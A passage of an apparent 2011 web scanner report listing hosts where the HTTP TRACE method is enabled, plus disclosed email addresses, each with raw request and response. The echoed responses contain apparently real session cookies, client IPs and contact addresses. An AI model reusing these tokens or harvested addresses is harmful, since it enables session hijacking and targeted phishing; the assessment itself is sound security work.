Severity:	Information
Confidence:	Certain
Host:	http://matcher-apx.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 23a9daaeecae978b

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:07:56 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 23a9daaeecae978b; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; id=2814750682866683; RMFM=011QXErgU10I1k; Motorola=247B3; dlx_20100929=set; other_20110126=set; session=1308239531|1308240466; dlx_
...[SNIP]...

17.13. http://matcher.bidder7.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: 4e3195861b1d9c1c

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:07:49 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: 4e3195861b1d9c1c; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; id=2814750682866683; RMFM=011QXErgU10I1k; Motorola=247B3; dlx_20100929=set; other_20110126=set; session=1308239531|1308240466
Conn
...[SNIP]...

17.14. http://matcher.bidder8.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher.bidder8.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 9b85bbf6bdb373

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 9b85bbf6bdb373; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; id=2814750682866683; RMFM=011QXErgU10I1k; Motorola=247B3; dlx_20100929=set; other_20110126=set; session=1308239531|1308240466; dlx_
...[SNIP]...

17.15. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: bab469e26cf039f4

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:07:49 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: bab469e26cf039f4; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD0
...[SNIP]...

17.16. http://pixel.everesttech.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 5454a09f2d9cbfbf

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:11:48 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.everesttech.net
Cookie: 5454a09f2d9cbfbf; everest_g_v2=g_surferid~nqpN0lLRpx4AAMT1; everest_session_v2=4exN@kdiNH4AAIVh
Connection: Keep-Alive
X-EF-Forwarded-For: 173.193.214.243

17.17. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 371cd7befdc78041

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:28:39 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 371cd7befdc78041; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD0
...[SNIP]...

17.18. http://puma.vizu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/

Request

TRACE / HTTP/1.0
Host: puma.vizu.com
Cookie: 58df286733b0561d

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:14 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n12 ( origin>CONN)
Content-Length: 365
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: origin.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n12.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.22
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://puma.vizu.com/
Cookie: 58df286733b0561d; ptc=1879%3D728x90-1
Connection: keep-alive

17.19. http://rt.legolas-media.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 42faff0606b1da0d

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:26:25 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 42faff0606b1da0d; ui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4; lgpr=//8=; lgtix=NQACAM8ANgABAMUABgABAMUARAQBANYASQABAMUASgABAMUADAABAMUAHAADAOMA/QABAMUAXgACANkAXwABAMUA
X-Forwarded-For: 173.193.214.243

17.20. http://secure-us.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 5a42baec95f8da8d

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:20 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5a42baec95f8da8d; V5=AStfNgpFIF5WEhozICIjIyE6KkIkO1InHlKWAw__; IMRID=Tc1h14psGhMAAHNb-FY
Host: secure-us.imrworldwide.com

17.21. http://spotlight.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/

Request

TRACE / HTTP/1.0
Host: spotlight.creditcards.com
Cookie: 56180354a7a309b7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: spotlight.creditcards.com
Cookie: 56180354a7a309b7; OAID=aaa441a9105b309385d19a81a43e09ae; SSBAL=node.web1; SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2
...[SNIP]...

17.22. http://t.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 75d3cfa72a107173

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:08:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 75d3cfa72a107173; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; id=2814750682866683; session=1308233337|1308233337
Connection: Keep-Alive
MIG_IP: 173.193.214.243

17.23. http://tacoda.at.atwola.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: d48f87662701700c

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:34 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: d48f87662701700c; ANRTT=; Tsid=0^1308307172^1308308972|18201^1308307172^1308308972; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557
...[SNIP]...

17.24. http://tap.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 993027348868484

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:27:11 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: 993027348868484; SERVERID=; dq=11|4|7|0; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2
...[SNIP]...

17.25. http://tracking.hubspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.hubspot.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 8ba756e554e32b0b

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:51:03 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 8ba756e554e32b0b

17.26. http://www.lightsquared.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightsquared.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.lightsquared.com
Cookie: 355ee180c007dccc

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:50:19 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lightsquared.com
Cookie: 355ee180c007dccc; PHPSESSID=o8lr5d4di75ipopo7a9ll7olo7

17.27. http://www.nutter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nutter.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.nutter.com
Cookie: 88760eae88c9d315

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:12 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 88760eae88c9d315
Host: www.nutter.com

18. Email addresses disclosed previous next
There are 34 instances of this issue:

http://ads1.msn.com/library/dap.js
http://control.radiumone.com/gwallet-network-admin/com.gwallet.network.admin.NetworkAdminApp/E28F87B1547ED2D93778B6C7B663A9A5.cache.html
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm
http://radiumone.com/mobile/index.html
http://radiumone.com/network/index.html
http://radiumone.com/social/developer.html
http://s.wsj.net/djscript/j_global.js
https://services.wsj.com/Gryphon/javascripts/djcheck.js
http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0004/provided/j_global_slim/version/20110524192024.js
http://sj.wsj.net/djscript/require/j_global_slim/version/20110615092718.js
http://soundcloud.com/premium
http://www.capitalone.com/css/footer.css
http://www.capitalone.com/css/framework/base.css
http://www.capitalone.com/css/framework/grid.css
http://www.capitalone.com/css/framework/print.css
http://www.capitalone.com/css/header.css
http://www.capitalone.com/css/page-nav-heading.css
http://www.capitalone.com/css/page-type/product.css
http://www.creditcards.com/javascript/s_code.js
http://www.egov.com/Scripts/jquery.pngFix.js
http://www.egov.com/Solutions/Funding/Pages/default.aspx
http://www.egov.com/Solutions/Pages/default.aspx
http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js
http://www.homedepot.com/wcsstore/hdus/en_US/styles/jquery.fancybox-1.3.4.css
http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js
http://www.homedepot.com/wcsstore/hdus/scripts/jquery.cookie.js
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate
http://www.ilslaunch.com/sites/default/files/js/js_2518332c0b755f1d85c27c9500834ae3.js
http://www.inlandbusinesslaw.com/attorneyprofiles.html
http://www.inlandbusinesslaw.com/contactus.html
http://www.inlandbusinesslaw.com/scripts/user.js
http://www.lightsquared.com/contact-us/
http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/
http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

18.1. http://ads1.msn.com/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js?rti=201008 HTTP/1.1
Host: ads1.msn.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; mh=MSFT; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; expid=id=4a7a2cfa63914a13b3d0d2ba28a1bace&bd=2011-05-20T00:26:57.567&v=2; SRCHHPGUSR=AS=1; Sample=93; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:25:57 GMT
Expires: Fri, 17 Jun 2011 18:45:47 GMT
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13811

var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

18.2. http://control.radiumone.com/gwallet-network-admin/com.gwallet.network.admin.NetworkAdminApp/E28F87B1547ED2D93778B6C7B663A9A5.cache.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://control.radiumone.com
Path:	/gwallet-network-admin/com.gwallet.network.admin.NetworkAdminApp/E28F87B1547ED2D93778B6C7B663A9A5.cache.html

Issue detail

The following email addresses were disclosed in the response:

developers@gwallet.com
developers@radiumone.com
mobilesales@radiumone.com

Request

GET /gwallet-network-admin/com.gwallet.network.admin.NetworkAdminApp/E28F87B1547ED2D93778B6C7B663A9A5.cache.html HTTP/1.1
Host: control.radiumone.com
Proxy-Connection: keep-alive
Referer: http://control.radiumone.com/gwallet-network-admin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116211333.1308306394.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=116211333.243210582.1308306394.1308306394.1308306394.1; __utmc=116211333; __utmb=116211333.12.10.1308306394; __utmz=248870037.1308307185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248870037.274395620.1308307185.1308307185.1308307185.1; __utmc=248870037; __utmb=248870037.1.10.1308307185

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:48 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Last-Modified: Wed, 18 May 2011 18:18:12 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5330636

<html>
<head><meta charset="UTF-8" /><script>
var $gwt_version = "2.1.0";
var $wnd = parent;
var $doc = $wnd.document;
var $moduleName, $moduleBase;
var $strongName = 'E28F87B1547ED2D93778B6C7B663A9A5
...[SNIP]...
<a href="mailto:developers@radiumone.com">developers@gwallet.com<\/a>
...[SNIP]...
rn_892 = 'margin-right:15px;', $intern_399 = 'marginLeft', $intern_400 = 'marginTop', $intern_836 = 'menu', $intern_8 = 'message', $intern_800 = 'middlePanel', $intern_832 = 'minWidth', $intern_953 = 'mobilesales@radiumone.com', $intern_119 = 'moduleStartup', $intern_52 = 'mousedown', $intern_138 = 'mousemove', $intern_139 = 'mouseout', $intern_140 = 'mouseover', $intern_141 = 'mouseup', $intern_144 = 'mousewheel', $intern_
...[SNIP]...

18.3. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

Issue detail

The following email address was disclosed in the response:

wilq32@gmail.com

Request

GET /usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer%5F631524426&ProspectID=3F41C92F74AE43D4B3334B0467420B9F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_DiamondPreferred_MC_21monthBTP%7C1308309048380%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server:
Date: Fri, 17 Jun 2011 10:40:49 GMT
Connection: close
Content-Length: 6150

// VERSION: 1.6 LAST UPDATE: 21.08.2010
/*
* THIS IS FREE SCRIPT BUT LEAVE THIS COMMENT IF
* YOU WANT USE THIS CODE ON YOUR SITE
*
* Made by Wilq32, wilq32@gmail.com, Wroclaw, Poland, 01.2009
* http://wilq32.blogspot.com
*
*/
(function(f){for(var g,j=document.getElementsByTagName("head")[0].style,i="transformProperty WebkitTransform OTransform".split(" "),
...[SNIP]...

18.4. http://radiumone.com/mobile/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://radiumone.com
Path:	/mobile/index.html

Issue detail

The following email address was disclosed in the response:

mobilesales@radiumone.com

Request

GET /mobile/index.html HTTP/1.1
Host: radiumone.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116211333.1308306394.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=116211333.243210582.1308306394.1308306394.1308306394.1; __utmc=116211333; __utmb=116211333.3.10.1308306394

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:26:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Jun 2011 08:05:49 GMT
ETag: "7f220ee-2110-1ae41140"
Accept-Ranges: bytes
Content-Length: 8464
Connection: close
Content-Type: text/html

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>RadiumOne - Results Powered by Connections</title>
<styl
...[SNIP]...
<a href="mailto:mobilesales@radiumone.com" title="contact us">
...[SNIP]...

18.5. http://radiumone.com/network/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://radiumone.com
Path:	/network/index.html

Issue detail

The following email address was disclosed in the response:

media@radiumone.com

Request

GET /network/index.html HTTP/1.1
Host: radiumone.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116211333.1308306394.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=116211333.243210582.1308306394.1308306394.1308306394.1; __utmc=116211333; __utmb=116211333.2.10.1308306394

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:26:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Jun 2011 08:05:56 GMT
ETag: "7f220f2-2597-1b4ee100"
Accept-Ranges: bytes
Content-Length: 9623
Connection: close
Content-Type: text/html

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>RadiumOne - Results Powered by Connections</title>
<styl
...[SNIP]...
<a href="mailto:media@radiumone.com" title="contact us">
...[SNIP]...

18.6. http://radiumone.com/social/developer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://radiumone.com
Path:	/social/developer.html

Issue detail

The following email address was disclosed in the response:

busdev@radiumone.com

Request

GET /social/developer.html HTTP/1.1
Host: radiumone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116211333.1308306394.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=116211333.243210582.1308306394.1308306394.1308306394.1; __utmc=116211333; __utmb=116211333.4.10.1308306394

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:27:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Jun 2011 08:06:03 GMT
ETag: "7f22118-2568-1bb9b0c0"
Accept-Ranges: bytes
Content-Length: 9576
Connection: close
Content-Type: text/html

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>RadiumOne - Results Powered by Connections</title>
<styl
...[SNIP]...
<a href="mailto:busdev@radiumone.com" title="contact us">
...[SNIP]...
<a href="mailto:busdev@radiumone.com">
...[SNIP]...

18.7. http://s.wsj.net/djscript/j_global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.wsj.net
Path:	/djscript/j_global.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /djscript/j_global.js HTTP/1.1
Host: s.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 02 Sep 2010 14:13:03 GMT
Vary: Accept-Encoding
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep09 - Tue 03/22/11 - 01:01:18 EDT
If-Modified-Since: Thu, 02 Sep 2010 14:13:03 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 727667
Cache-Control: max-age=1055951
Expires: Tue, 28 Jun 2011 16:43:32 GMT
Date: Thu, 16 Jun 2011 11:24:21 GMT
Connection: close

if (typeof dj == "undefined") { dj = {}; }
if (typeof dj.context == "undefined") { dj.context = {}; }
if (typeof djConfig=="undefined") { djConfig={}; }

/**
* NOTE TO DEVELOPER:
*
* This f
...[SNIP]...
7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=
...[SNIP]...

18.8. https://services.wsj.com/Gryphon/javascripts/djcheck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.wsj.com
Path:	/Gryphon/javascripts/djcheck.js

Issue detail

The following email address was disclosed in the response:

alpha@beta.com

Request

GET /Gryphon/javascripts/djcheck.js HTTP/1.1
Host: services.wsj.com
Connection: keep-alive
Referer: https://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=160
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; 